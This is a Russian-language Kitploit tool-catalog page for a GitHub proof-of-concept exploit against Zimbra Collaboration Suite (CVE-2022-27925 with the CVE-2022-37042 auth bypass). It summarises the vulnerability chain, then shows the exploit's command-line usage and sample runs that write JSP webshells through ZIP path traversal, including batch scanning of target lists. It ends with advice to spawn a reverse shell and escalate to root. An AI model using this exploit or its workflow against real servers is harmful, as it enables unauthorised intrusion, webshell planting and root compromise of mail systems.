Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-27925 — Zimbra CVE-2022-27925 PoC | Kitploit
Инструменты/GitHubGitHub/josexv1/cve-2022-27925
Повышение привилегийГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubjosexv1/cve-2022-27925

CVE-2022-27925

Zimbra CVE-2022-27925 PoC

Репозиторий
431914 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-27925

Описание

10 мая 2022 года Zimbra выпустила версии 9.0.0 patch 24 и 8.8.15 patch 31 для устранения множества уязвимостей в Zimbra Collaboration Suite, включая CVE-2022-27924 (о которой мы писали ранее) и CVE-2022-27925.

Изначально Zimbra назвала CVE-2022-27925 аутентифицированной атакой обхода пути, при которой административный пользователь мог записывать файлы в любую директорию файловой системы от имени учетной записи Zimbra. Поскольку изначально считалось, что это атака, доступная только администратору, NVD присвоила ей базовую оценку CVSS 7.8. Позже Volexity заметила, что злоумышленники, эксплуатирующие эту уязвимость, нашли способ обойти административные требования, и написала об этом 10 августа 2022 года. Этот новый обход аутентификации получил новый идентификатор – CVE-2022-37042.

Комбинируя оригинальную уязвимость обхода пути и новый обход аутентификации, злоумышленники могут удаленно скомпрометировать систему Zimbra Collaboration Suite через порт администратора (по умолчанию 7071) анонимно. В сочетании с неисправленной в настоящее время уязвимостью повышения привилегий, о которой мы недавно писали и написали эксплойт, эти три уязвимости приводят к удаленному выполнению команд от имени пользователя root на незапатченных системах.

Хотя публичные уведомления не упоминают об этом, согласно нашему анализу, уязвима Zimbra Collaboration Suite Network Edition (платная версия), а Open Source Edition (бесплатная) – нет (поскольку в ней отсутствует уязвимая конечная точка mboximport). Уязвимыми версиями являются:

  • Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (и более ранние)
  • Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (и более ранние)

Эти уязвимости (и другие в Zimbra) активно эксплуатируются в дикой природе, и поэтому их следует как можно скорее исправить или отключить. Если вы подозреваете, что вас взломали, Zimbra предоставляет инструкции по перестройке вашего сервера Zimbra Collaboration Suite с нуля на последнем патче без потери данных.

Источник: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis

Использование

root@kitploit:~
 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

usage: exploit.py [-h] [-t TARGET] [-l LIST]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URl with protocol HTTPS
  -l LIST, --list LIST  List of targets

Пример запуска

root@kitploit:~
root@root# python exploit.py -t zimbra.example.com
_____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux

root@root# python exploit.py -l targets.txt

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable

root@root# .

Получите root-доступ!

Чтобы получить root-доступ, вы можете вызвать обратную оболочку (reverse shell) и затем использовать Slaper's LPE

Скачать инструмент